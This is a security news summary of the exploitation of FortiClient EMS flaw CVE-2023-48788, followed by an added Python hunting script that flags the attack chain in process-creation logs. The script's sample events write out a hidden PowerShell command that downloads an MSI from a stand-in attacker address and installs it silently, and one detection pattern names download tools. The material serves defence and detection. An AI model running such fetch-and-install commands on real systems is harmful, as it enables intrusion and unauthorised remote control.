
Fortinet Vulnerability Exploited: Unauthorized RMM Tools and PowerShell Backdoors Deployed

Threat actors have been observed exploiting a FortiClient EMS vulnerability, CVE-2023-48788, to install unauthorised RMM tools and PowerShell backdoors on targeted systems. In the observed intrusions, an external inbound network connection to the FCMdaemon process was followed by the download and execution of RMM tools or PowerShell-based backdoors. Fortinet patched the vulnerability in March 2024; it carries a severity score of 9.8 (Critical).

The vulnerability allows an unauthenticated attacker to execute commands with SYSTEM privileges by sending specially crafted messages. Horizon3 researchers have published a full analysis of the exploitation. In brief, CVE-2023-48788 is a SQL injection flaw in the FortiClient EMS application.

The exploitation begins with an external IP address sending a specially crafted request to the FortiClient EMS FCMdaemon process on TCP port 8013. On an unpatched version, the crafted message reaches the EMS backend database and results in SQL injection. The threat actors use that injection to enable `xp_cmdshell` and execute commands through `cmd.exe`. When the attack succeeds, `sqlservr.exe` (the SQL Server process of the EMS instance installed under `MSSQL14.FCEMS`) spawns a `cmd.exe` instance that runs commands with SYSTEM privileges. That parent-child relationship is the clearest detection point: the EMS database process has no legitimate reason to launch a shell.

Having obtained command execution as SYSTEM, the threat actors use the PowerShell `Invoke-WebRequest` cmdlet to download a Windows Installer (.msi) package from an attacker-controlled IP address. The MSI typically contains a Remote Monitoring and Management (RMM) tool, which they install by launching `msiexec.exe`. In some cases the RMM installations failed, and unsuccessful attempts to deploy PowerShell backdoors were also observed. The time from initial access to installation of the RMM tool or backdoor ranged from 36 seconds to 47 minutes.
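As an added hunting example (not code from the original article or from the reports it summarises), the following Python checks process-creation records for the chain described above: the EMS SQL Server process spawning a shell via `xp_cmdshell`, PowerShell fetching an .msi, `msiexec.exe` installing it from a temp directory, and the elapsed time between the first spawn and the install. The records are constructed in the shape of Sysmon Event ID 1 fields; the timestamps, the `203.0.113.10` address (a documentation-range stand-in) and the `agent.msi` file name are illustrative assumptions, not observed indicators.

```python
"""Hunt for the CVE-2023-48788 post-exploitation chain in process-creation records.

Added example, not from the original article. The records below are constructed
in the shape of Sysmon Event ID 1 (UtcTime, Image, ParentImage, CommandLine);
the timestamps, the 203.0.113.10 address and agent.msi are illustrative only.
"""
import re
from datetime import datetime

FCEMS_INSTANCE = "MSSQL14.FCEMS"  # SQL Server instance bundled with FortiClient EMS
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell downloading an .msi via Invoke-WebRequest or its iwr/curl/wget aliases.
DOWNLOAD_RE = re.compile(r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b).*\.msi\b", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\temp\\", re.IGNORECASE)

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Binn\sqlservr.exe"

# Constructed sample: two benign events, then the three-step chain from the article.
SAMPLE_EVENTS = [
    # Benign: the service control manager starts the EMS SQL instance.
    {"UtcTime": "2024-03-20 09:58:00.000", "Image": SQLSERVR,
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"' + SQLSERVR + r'" -sFCEMS'},
    # Benign: an administrator opens a prompt from Explorer.
    {"UtcTime": "2024-03-20 09:59:10.000", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r'"C:\Windows\System32\cmd.exe"'},
    # Step 1: xp_cmdshell makes the EMS SQL Server process spawn cmd.exe.
    {"UtcTime": "2024-03-20 10:00:00.000", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": SQLSERVR,
     "CommandLine": r'cmd.exe /c powershell -nop -w hidden -c "Invoke-WebRequest -Uri http://203.0.113.10/agent.msi -OutFile C:\Windows\Temp\agent.msi"'},
    # Step 2: PowerShell downloads the MSI package.
    {"UtcTime": "2024-03-20 10:00:05.000",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -nop -w hidden -c "Invoke-WebRequest -Uri http://203.0.113.10/agent.msi -OutFile C:\Windows\Temp\agent.msi"'},
    # Step 3: msiexec installs the downloaded package silently.
    {"UtcTime": "2024-03-20 10:00:36.000", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\Temp\agent.msi /qn"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_fcems_sqlserver(path):
    """True if the image is sqlservr.exe running out of the FortiClient EMS instance directory."""
    return basename(path) == "sqlservr.exe" and FCEMS_INSTANCE.lower() in path.lower()


def shells_spawned_by_ems_sql(events):
    """Detection 1: the EMS SQL Server process spawning a shell, which is what xp_cmdshell does."""
    return [e for e in events
            if is_fcems_sqlserver(e["ParentImage"]) and basename(e["Image"]) in SHELLS]


def msi_downloads(events):
    """Detection 2: PowerShell fetching an .msi from the network."""
    return [e for e in events
            if basename(e["Image"]) in POWERSHELL and DOWNLOAD_RE.search(e["CommandLine"])]


def msiexec_installs(events):
    """Detection 3: msiexec installing a package from a temp directory."""
    return [e for e in events
            if basename(e["Image"]) == "msiexec.exe" and TEMP_DIR_RE.search(e["CommandLine"])]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")


def seconds_to_install(events):
    """Seconds from the first xp_cmdshell spawn to the first msiexec launch, or None if either is absent."""
    spawns = shells_spawned_by_ems_sql(events)
    installs = msiexec_installs(events)
    if not spawns or not installs:
        return None
    first_spawn = min(parse_time(e["UtcTime"]) for e in spawns)
    first_install = min(parse_time(e["UtcTime"]) for e in installs)
    return (first_install - first_spawn).total_seconds()


if __name__ == "__main__":
    for label, hits in (("EMS SQL Server spawned a shell", shells_spawned_by_ems_sql(SAMPLE_EVENTS)),
                        ("PowerShell downloaded an .msi", msi_downloads(SAMPLE_EVENTS)),
                        ("msiexec install from temp", msiexec_installs(SAMPLE_EVENTS))):
        for e in hits:
            print(f"[{e['UtcTime']}] {label}: {e['CommandLine']}")
    print("seconds from spawn to install:", seconds_to_install(SAMPLE_EVENTS))
```

The first detection is the one to alert on: the benign `services.exe` start of `sqlservr.exe` and the Explorer-launched `cmd.exe` are ignored, and only the `sqlservr.exe` to `cmd.exe` spawn fires. The other two checks are noisier on their own (administrators do install MSIs) and are best used to build the timeline once the first has fired.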

For more details, please visit the main article: Fortinet Vulnerability Exploited To Deploy RMM tools And PowerShell Backdoors.
